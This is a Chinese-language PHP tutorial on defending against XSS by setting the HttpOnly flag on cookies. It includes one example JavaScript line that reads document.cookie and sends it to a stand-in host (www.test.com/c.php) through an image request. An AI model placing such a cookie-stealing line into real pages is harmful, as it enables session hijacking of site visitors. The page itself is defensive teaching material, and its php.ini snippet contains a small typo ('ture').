萬盛學電腦網

 萬盛學電腦網 >> 網絡編程 >> php編程 >> xss防御之php利用httponly防xss攻擊

xss防御之php利用httponly防xss攻擊

 這篇文章主要介紹了xss防御之php利用httponly防xss攻擊,下面是PHP設置HttpOnly的方法,需要的朋友可以參考下

xss的概念就不用多說了,它的危害是極大的,這就意味著一旦你的網站出現xss漏洞,就可以執行任意的js代碼,最可怕的是攻擊者利用js獲取cookie或者session劫持,如果這裡面包含了大量敏感信息(身份信息,管理員信息)等,那完了。。。   如下js獲取cookie信息:    代碼如下: url=document.top.location.href; cookie=document.cookie; c=new Image(); c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;     一般cookie都是從document對象中獲取的,現在浏覽器在設置Cookie的時候一般都接受一個叫做HttpOnly的參數,跟domain等其他參數一樣,一旦這個HttpOnly被設置,你在浏覽器的document對象中就看不到Cookie了。   PHP設置HttpOnly:    代碼如下: //在php.ini中,session.cookie_httponly = ture 來開啟全局的Cookie的HttpOnly屬性 ini_set("session.cookie_httponly", 1);   //或者setcookie()的第七個參數設置為true session_set_cookie_params(0, NULL, NULL, NULL, TRUE);     對於PHP5.1以前版本的PHP通過:    代碼如下: header("Set-Cookie: hidden=value; httpOnly");     最後,HttpOnly不是萬能的!
copyright © 萬盛學電腦網 all rights reserved